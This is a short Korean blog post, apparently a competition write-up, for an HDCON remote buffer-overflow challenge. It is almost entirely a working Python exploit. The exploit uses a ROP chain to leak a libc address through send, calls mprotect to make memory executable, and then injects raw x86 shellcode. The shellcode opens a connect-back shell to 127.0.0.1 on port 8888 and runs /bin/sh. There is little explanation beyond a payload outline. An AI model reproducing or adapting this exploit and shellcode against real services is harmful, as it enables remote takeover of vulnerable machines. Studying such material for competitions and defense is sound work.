2013.06.17 17:30

HDCON REMOTE BOF 


Hacked by singi , exploiting & report by 광운



hdconNo5_exp.py

luckyzzang



공격 페이로드는 아래와 같다.


STAGE1 = SEND + PPPR + SOCKFD + GOT_TIME + VALUE_0x4 + NULL + \

              FUNC + AAAA + SOCKFD


STAGE2 = MPROTECT + PPPR + CUSTOM_STACK + SIZEOF_CUSTOM + MODE_EXEC +\

               RECV + RETURN_CUSTOM + SOCKFD + CUSTOM_STACK + SHELLCODELEN + NULL


STAGE3 = SELLCODE



from socket import *

import sys

import struct


SHELLCODE ="\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x6a\x02\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x7f\x00\x00\x01\x66\x68\x22\xb8\x66\xb9\x02\x00\x66\x51\x89\xe1\x6a\x10\x51\x53\x89\xe1\xb0\x66\x31\xdb\x43\x43\x43\xcd\x80\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"

SHELLCODELEN = struct.pack('<L', len(SHELLCODE))


PLT_SEND = 0x08048610

GOT_TIME = 0x804a004

ADDR_FUNC = 0x080486d4


PPPR = struct.pack('<L', 0x804878d)

PPPPR = struct.pack('<L', 0x80489cc)

STAGE1 = '\x41' * 1036 + struct.pack('<L', PLT_SEND) + PPPPR + '\x04\x00\x00\x00' + struct.pack('<L', GOT_TIME)

STAGE1 += '\x04\x00\x00\x00' + '\x00\x00\x00\x00' +struct.pack('<L', ADDR_FUNC) + '\x41\x41\x41\x41' + '\x04\x00\x00\x00'


if __name__ == '__main__':

s = socket(AF_INET, SOCK_STREAM)

s.connect(('127.0.0.1', 7777))


s.recv(1024)

s.send(STAGE1)


ADDR_TIME = struct.unpack('<L', s.recv(4))[0]


ADDR_MPROTECT = ADDR_TIME + 0x41B70

ADDR_RECV = ADDR_TIME + 0x48080


STAGE2 = '\x41' * 1036 + struct.pack('<L',ADDR_MPROTECT ) + PPPR + '\x00\x80\x04\x08' + '\x00\x10\x00\x00'

STAGE2 += '\x07\x00\x00\x00' + struct.pack('<L', ADDR_RECV) + '\x91\x87\x04\x08' + '\x04\x00\x00\x00'

STAGE2 += '\x91\x87\x04\x08' + SHELLCODELEN + '\x00\x00\x00\x00'


s.recv(1024)

s.send(STAGE2)

s.send(SHELLCODE)


s.close()




Posted by k1rha